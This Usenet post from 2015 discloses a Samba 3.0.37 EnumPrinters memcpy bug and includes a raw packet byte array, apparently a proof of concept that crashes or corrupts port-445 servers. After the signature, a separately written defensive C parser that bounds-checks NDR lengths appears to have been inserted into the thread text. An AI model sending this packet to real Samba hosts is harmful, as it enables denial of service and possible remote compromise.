| From | "Gabriele Avosani" <g.avosani@gmail.com> |
|---|---|
| Newsgroups | comp.os.linux.security |
| Subject | [Samba 3.0.37] EnumPrinters memory consumption |
| Date | 2015-05-18 18:56 +0200 |
| Organization | Aioe.org NNTP Server |
| Message-ID | <mjd5k6$594$1@speranza.aioe.org> (permalink) |
Hello,

there is a bug in Samba 3.0.37 (latest) in the EnumPrinters RPC function (anonymous access). The bug is in parse_prs.c:398: we take control of the length and source pointer of a memcpy, leading to memory corruption, very fast exhaustion of resources (blocking the computer is very easy) and, probably, remote code execution.

This is the packet code to be sent to port 445, EnumPrinters RPC function, opcode 0x0.

```c
char fr1[]="\x0a\x00\x00\x00\x21\xd3\x9f\x98\x06\x00\x00\x00\x00\x00\x00\x00"
           "\x06\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
           "\xd8\x50\x60\x00\x21\x33\x33\x73\x00\x00\x00\x01\x42\x42\x06\x20"
           "\x0a\x00\x00\x00\x21\xd3\x9f\x28\x06\x00\x00\x00\x00\x00\x00\x00"
           "\x06\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
           "\xd8\x50\x60\x20\x21\x33\x33\x2a\x40\x40\x40\x20\x45\x45\x06\x20"
           "\x00\x00";
```

Gabriele Avosani

P.S. Looking for a job as a remote programmer (short and long term). PHP, Perl, Java, C/C++ and more (Linux and Windows), thanks in advance.
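The bug class the post describes, a memcpy whose length is taken from the wire, is closed by checking every wire-supplied count against both the received buffer and the destination before copying. The following is an added example, not code from the post or from Samba: it assumes the standard NDR conformant varying string layout (max_count, offset, actual_count, then UTF-16 units), the post does not say which field is involved, and `parse_ndr_wstring` and the sample arrays are hypothetical.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Read a little-endian 32-bit value from the wire. */
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Unmarshal an NDR conformant varying UTF-16 string:
 *   uint32 max_count, uint32 offset, uint32 actual_count,
 *   then actual_count 16-bit code units.
 * Copies the raw code units to out and returns the number of bytes
 * consumed, or -1 if a wire length disagrees with either buffer.
 * parse_ndr_wstring is a hypothetical name, not a Samba function. */
long parse_ndr_wstring(const uint8_t *buf, size_t len,
                       uint8_t *out, size_t out_len) {
    if (len < 12) return -1;                 /* header must be present */
    uint32_t max_count = rd32(buf);
    uint32_t offset    = rd32(buf + 4);
    uint32_t actual    = rd32(buf + 8);

    /* The three counts must agree; written to avoid wraparound. */
    if (offset > max_count || actual > max_count - offset) return -1;
    /* Source bound: the units must lie inside the received bytes. */
    if (actual > (len - 12) / 2) return -1;
    /* Destination bound: the copy must fit the caller's buffer. */
    size_t nbytes = (size_t)actual * 2;      /* <= len - 12, no overflow */
    if (nbytes > out_len) return -1;

    memcpy(out, buf + 12, nbytes);
    return (long)(12 + nbytes);
}

/* Constructed samples: a well-formed "AAAAA\0" and an oversized count. */
static const uint8_t good[] = {6,0,0,0, 0,0,0,0, 6,0,0,0,
    'A',0,'A',0,'A',0,'A',0,'A',0,0,0};
static const uint8_t huge[] = {0xff,0xff,0xff,0xff, 0,0,0,0,
    0xff,0xff,0xff,0xff, 'A',0};
static uint8_t sink[64];                     /* destination for the demo */

int main(void) {
    printf("good: %ld\n", parse_ndr_wstring(good, sizeof good, sink, sizeof sink));
    printf("huge: %ld\n", parse_ndr_wstring(huge, sizeof huge, sink, sizeof sink));
    return 0;
}
```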
- [Samba 3.0.37] EnumPrinters memory consumption, "Gabriele Avosani" <g.avosani@gmail.com>, 2015-05-18 18:56 +0200
- Re: [Samba 3.0.37] EnumPrinters memory consumption, Richard Kettlewell <rjk@greenend.org.uk>, 2015-05-19 18:04 +0100